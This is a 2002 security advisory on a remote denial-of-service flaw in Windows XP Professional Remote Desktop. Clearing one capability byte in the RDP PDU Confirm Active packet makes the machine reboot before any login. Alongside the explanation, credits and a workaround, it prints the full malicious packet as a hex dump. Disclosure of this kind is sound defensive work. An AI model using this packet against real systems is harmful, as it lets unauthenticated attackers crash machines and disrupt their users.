Vulnerable Microsoft Windows XP Professional Microsoft Windows .NET Standard Server Beta 3 Non-vulnerable Microsoft Windows 2000 Server Background Windows XP Professional has a remote denial of service attack when Remote Desktop is enabled. Remote Desktop is XP Professional's single-user RDP server (Terminal Services). Discussion At the start of the protocol there is a negotiation of client and server graphics capabilities, in a packet called PDU Confirm Active. A block of 32 bytes in this packet allows the client to disable the drawing commands that it does not support. One of these apparently controls whether the Pattern BLT command is sent. On Windows 2000 Server, disabling this command will make the server send bitmaps instead of Pattern BLT commands. However, Windows XP Professional apparently reboots when it tries to render patterns; since this happens while the login screen is being drawn, this does not require the client to have logged on or authenticated to the server. This applies to all versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also reproducible with Windows .NET Standard Server Beta 3. Workaround Disable Remote Desktop (from Control Panel, System, Remote, Remote Desktop, deselect the option "Allow users to connect remotely to this computer"). Exploit Shown below is the unencrypted packet contents for the problematic PDU Confirm Active packet. The only change is from 01 to 00 on the line indicated. c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01 4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00 03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00 00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05 00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00 2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01" 00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00 00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00 00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00 00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00 0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00 0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00 0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00 fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00 fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01 40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00 01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00 14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00 00 0a 00 01 References Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals for telematic services, ITU-T. Microsoft was notified on 16 April 2002. Credits Ben Cohen ben.cohen@skygate.co.uk Skygate Technology Ltd. http://www.skygate.co.uk/ +44 (0)20 8542 7856
